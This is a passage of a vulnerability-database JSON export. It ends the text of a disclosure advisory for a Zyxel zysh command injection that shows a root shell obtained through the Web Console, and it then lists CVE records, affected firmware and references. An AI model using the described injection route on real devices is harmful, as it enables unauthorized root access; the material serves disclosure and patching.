(CN7010p1.2-800-AAP) GNU/Linux\nbash-5.1# id\nid\nuid=0(root) gid=10000(operator) groups=0(root),10000(operator)\nbash-5.1#\n\nOf course, you can choose to execute your favorite Python code instead. \n\nApparently, we managed to find a way to connect the standard input of the\nWeb Console to the standard input of the python process we spawned with the\nfirst command, in a mind-bending exploit. To preserve our sanity, we have\nnot thoroughly investigated how this is happening... but it works! And it\nis very reliable. \n\nOn our test device, this exploitation vector only works from the Web\nConsole, as an authenticated admin or limited-admin user. As an added\nbenefit, as we have seen, the Web Console spawns zysh as root. \n\nWe do not exclude other ways to exploit the described vulnerability,\nperhaps by creating or overwriting critical system files. It could also be\neasily abused to clobber arbitrary files and cause a Denial of Service\ncondition on vulnerable devices, although we are not going to provide a\nproof-of-concept exploit for this (we are pretty sure you can easily figure\nit out on your own anyway). \n\n\n--[ 6 - Affected products\n\nAccording to Zyxel, zysh is present on a wide range of products, including\ntheir security appliances such as FLEX, ATP, USG, VPN, and ZyWALL [9], AP\ncontrollers and APs. \n\nOur audit was conducted exclusively on a Zyxel USG20-VPN test device with\nFirmware 5.10. However, other products and firmware versions have been\nconfirmed by Zyxel to be affected by the same vulnerabilities. \n\n\n--[ 7 - Remediation\n\nDuring the whole coordinated disclosure process, Zyxel was very responsive. \nWorking with them has been a pleasure and we would like to publicly\nacknowledge it, as unfortunately this is not always the case with every\nvendor. \n\nThe memory corruption bugs were collectively assigned CVE-2022-26531, while\nthe OS command injection vulnerability was assigned CVE-2022-26532. Please refer\nto their advisory for patching information. \n\nWe have not checked the effectiveness of the fixes. \n\n\n--[ 8 - Disclosure timeline\n\n2022-02-25: Zyxel was notified via \u003csecurity@zyxel.com.tw\u003e. \n2022-02-25: Zyxel acknowledged our vulnerability reports. \n2022-03-17: Zyxel assigned CVE-2022-26531 and CVE-2022-26532 to the\n\t    reported issues and informed us of their intention to publish\n            their security advisory on 2022-05-24. \n2022-03-18: As a token of their appreciation, Zyxel gave us a certificate\n            of recognition. \n2022-05-24: Zyxel published their security advisory, following our\n            coordinated disclosure timeline. \n2022-06-07: HN Security published this advisory with full details. \n\n\n--[ 9 - References\n\n[0] https://www.zyxel.com/\n[1] https://security.humanativaspa.it/tag/zyxel/\n[2] https://www.dropbox.com/s/kvm5xwxqfrwge0t/USG20-VPN_5.10.zip?dl=1\n[3] https://en.wikipedia.org/wiki/MIPS_architecture\n[4] https://gtfobins.github.io/gtfobins/tcpdump/\n[5] https://www.tcpdump.org/manpages/tcpdump.1.html\n[6] https://twitter.com/pulsoid/status/1368146791473045504\n[7] http://phrack.org/issues/70/13.html#article\n[8] https://github.com/0xdea/exploits/blob/master/zyxel/raptor_zysh_fhtagn.exp\n[9] https://support.zyxel.eu/hc/en-us/articles/360013941859\n\n\nCopyright (c) 2022 Marco Ivaldi and Humanativa Group. All rights reserved",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-26532"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-26532"
          },
          {
            "db": "PACKETSTORM",
            "id": "167464"
          }
        ],
        "trust": 1.08
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "PACKETSTORM",
            "id": "167464",
            "trust": 1.8
          },
          {
            "db": "NVD",
            "id": "CVE-2022-26532",
            "trust": 1.8
          },
          {
            "db": "CS-HELP",
            "id": "SB2022052406",
            "trust": 0.6
          },
          {
            "db": "CXSECURITY",
            "id": "WLB-2022060063",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-3999",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-26532",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2022-26532"
          },
          {
            "db": "PACKETSTORM",
            "id": "167464"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-26532"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-3999"
          }
        ]
      },
      "id": "VAR-202205-1789",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.35069445
      },
      "last_update_date": "2023-12-18T13:22:22.970000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Zyxel USG/ZyWALL Fixes for operating system command injection vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=195230"
          },
          {
            "title": "",
            "trust": 0.1,
            "url": "https://github.com/hnsecurity/vulns "
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2022-26532"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-3999"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-26532"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.4,
            "url": "http://packetstormsecurity.com/files/167464/zyxel-buffer-overflow-format-string-command-injection.html"
          },
          {
            "trust": 1.8,
            "url": "https://www.zyxel.com/support/multiple-vulnerabilities-of-firewalls-ap-controllers-and-aps.shtml"
          },
          {
            "trust": 1.7,
            "url": "http://seclists.org/fulldisclosure/2022/jun/15"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2022052406"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/issue/wlb-2022060063"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/cveshow/cve-2022-26532/"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/78.html"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/hnsecurity/vulns"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://security.humanativaspa.it/tag/zyxel/"
          },
          {
            "trust": 0.1,
            "url": "https://www.zyxel.com/"
          },
          {
            "trust": 0.1,
            "url": "https://www.dropbox.com/s/kvm5xwxqfrwge0t/usg20-vpn_5.10.zip?dl=1"
          },
          {
            "trust": 0.1,
            "url": "https://www.tcpdump.org/manpages/tcpdump.1.html"
          },
          {
            "trust": 0.1,
            "url": "https://support.zyxel.eu/hc/en-us/articles/360013941859"
          },
          {
            "trust": 0.1,
            "url": "http://phrack.org/issues/70/13.html#article"
          },
          {
            "trust": 0.1,
            "url": "https://gtfobins.github.io/gtfobins/tcpdump/"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-26531"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-26532"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/hnsecurity/vulns/blob/main/hns-2022-02-zyxel-zysh.txt"
          },
          {
            "trust": 0.1,
            "url": "https://twitter.com/pulsoid/status/1368146791473045504"
          },
          {
            "trust": 0.1,
            "url": "https://security.humanativaspa.it/"
          },
          {
            "trust": 0.1,
            "url": "https://\u003credacted\u003e/webconsole/"
          },
          {
            "trust": 0.1,
            "url": "https://en.wikipedia.org/wiki/mips_architecture"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/0xdea/exploits/blob/master/zyxel/raptor_zysh_fhtagn.exp"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2022-26532"
          },
          {
            "db": "PACKETSTORM",
            "id": "167464"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-26532"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-3999"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2022-26532"
          },
          {
            "db": "PACKETSTORM",
            "id": "167464"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-26532"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-3999"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-05-24T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-26532"
          },
          {
            "date": "2022-06-19T15:26:57",
            "db": "PACKETSTORM",
            "id": "167464"
          },
          {
            "date": "2022-05-24T06:15:09.390000",
            "db": "NVD",
            "id": "CVE-2022-26532"
          },
          {
            "date": "2022-05-24T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202205-3999"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-06-19T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-26532"
          },
          {
            "date": "2022-06-19T19:15:08.557000",
            "db": "NVD",
            "id": "CVE-2022-26532"
          },
          {
            "date": "2022-06-21T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202205-3999"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "local",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-3999"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Zyxel USG/ZyWALL Operating system command injection vulnerability",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-3999"
          }
        ],
        "trust": 0.6
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "operating system commend injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-3999"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202304-1936

    Vulnerability from variot - Updated: 2023-12-18 13:00

    A buffer overflow vulnerability in the “sdwan_iface_ipc” binary of Zyxel ATP series firmware versions 5.10 through 5.32, USG FLEX series firmware versions 5.00 through 5.32, USG FLEX 50(W) firmware versions 5.10 through 5.32, USG20(W)-VPN firmware versions 5.10 through 5.32, and VPN series firmware versions 5.00 through 5.35, which could allow a remote unauthenticated attacker to cause a core dump with a request error message on a vulnerable device by uploading a crafted configuration file. usg flex 100 firmware, usg flex 100w firmware, USG FLEX 200 firmware etc. ZyXEL The product contains a classic buffer overflow vulnerability.Service operation interruption (DoS) It may be in a state

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202304-1936",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "usg flex 100",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.32"
          },
          {
            "model": "usg flex 700",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.32"
          },
          {
            "model": "usg flex 50",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.32"
          },
          {
            "model": "atp500",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.10"
          },
          {
            "model": "usg 20w-vpn",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.32"
          },
          {
            "model": "usg flex 500",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.32"
          },
          {
            "model": "vpn100",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.35"
          },
          {
            "model": "usg flex 50",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.00"
          },
          {
            "model": "vpn1000",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.35"
          },
          {
            "model": "usg flex 100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.00"
          },
          {
            "model": "atp200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.10"
          },
          {
            "model": "atp100w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.32"
          },
          {
            "model": "atp100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.10"
          },
          {
            "model": "vpn100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.00"
          },
          {
            "model": "atp800",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.10"
          },
          {
            "model": "usg flex 200",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.32"
          },
          {
            "model": "usg flex 500",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.00"
          },
          {
            "model": "usg flex 100w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.32"
          },
          {
            "model": "vpn1000",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.00"
          },
          {
            "model": "vpn50",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.00"
          },
          {
            "model": "usg 20w-vpn",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.10"
          },
          {
            "model": "atp100w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.10"
          },
          {
            "model": "atp800",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.32"
          },
          {
            "model": "vpn50",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.35"
          },
          {
            "model": "usg flex 700",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.00"
          },
          {
            "model": "usg flex 50w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.32"
          },
          {
            "model": "vpn300",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.00"
          },
          {
            "model": "atp200",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.32"
          },
          {
            "model": "vpn300",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.35"
          },
          {
            "model": "atp700",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.32"
          },
          {
            "model": "usg flex 200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.00"
          },
          {
            "model": "atp500",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.32"
          },
          {
            "model": "usg flex 50w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.10"
          },
          {
            "model": "atp100",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.32"
          },
          {
            "model": "usg flex 100w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.00"
          },
          {
            "model": "atp700",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.10"
          },
          {
            "model": "usg flex 200",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp100w",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp100",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp200",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg 20-vpn",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 100w",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 500",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "vpn50",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 50w",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp500",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 50",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "vpn100",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 100",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "vpn300",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 700",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp800",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp700",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "vpn1000",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009323"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-22917"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.32",
                        "versionStartIncluding": "5.00",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.32",
                        "versionStartIncluding": "5.00",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_100w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.32",
                        "versionStartIncluding": "5.00",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_50_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.32",
                        "versionStartIncluding": "5.00",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_50:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_50w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.32",
                        "versionStartIncluding": "5.10",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_50w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.32",
                        "versionStartIncluding": "5.00",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_700_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.32",
                        "versionStartIncluding": "5.00",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_700:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.35",
                        "versionStartIncluding": "5.00",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn1000_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.35",
                        "versionStartIncluding": "5.00",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn1000:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn300_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.35",
                        "versionStartIncluding": "5.00",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn300:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn50_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.35",
                        "versionStartIncluding": "5.00",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn50:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_20w-vpn_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.32",
                        "versionStartIncluding": "5.10",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_20w-vpn:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.32",
                        "versionStartIncluding": "5.10",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.32",
                        "versionStartIncluding": "5.10",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp100w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
